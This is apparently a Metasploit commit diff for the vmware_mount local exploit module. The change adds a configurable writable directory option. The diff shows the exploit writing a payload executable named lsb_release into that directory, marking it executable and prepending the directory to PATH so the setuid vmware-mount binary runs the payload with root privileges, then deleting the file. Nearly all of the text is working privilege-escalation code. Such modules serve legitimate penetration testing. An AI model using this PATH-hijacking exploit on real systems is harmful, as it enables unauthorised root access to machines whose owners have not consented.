Land rapid7#4277 - vmware-mount configurable directory

Author: OJ

modules/exploits/linux/local/vmware_mount.rb

@@ -53,6 +53,9 @@ def initialize(info={})
         'DisclosureDate' => "Aug 22 2013"
       }
       ))
+    register_options([
+        OptString.new("WRITABLEDIR", [ true, "A directory where you can write files.", "/tmp" ]),
+      ], self.class)
   end
 
   def check
@@ -68,13 +71,14 @@ def exploit
       fail_with(Failure::NotVulnerable, "vmware-mount doesn't exist or is not setuid")
     end
 
-    write_file("lsb_release", generate_payload_exe)
-
-    cmd_exec("chmod +x lsb_release")
-    cmd_exec("PATH=.:$PATH /usr/bin/vmware-mount")
+    lsb_path = File.join(datastore['WRITABLEDIR'], 'lsb_release')
+    write_file(lsb_path, generate_payload_exe)
+    cmd_exec("chmod +x #{lsb_path}")
+    cmd_exec("PATH=#{datastore['WRITABLEDIR']}:$PATH /usr/bin/vmware-mount")
     # Delete it here instead of using FileDropper because the original
     # session can clean it up
-    cmd_exec("rm -f lsb_release")
+    cmd_exec("rm -f #{lsb_path}")
+
   end
 
   def setuid?(remote_file)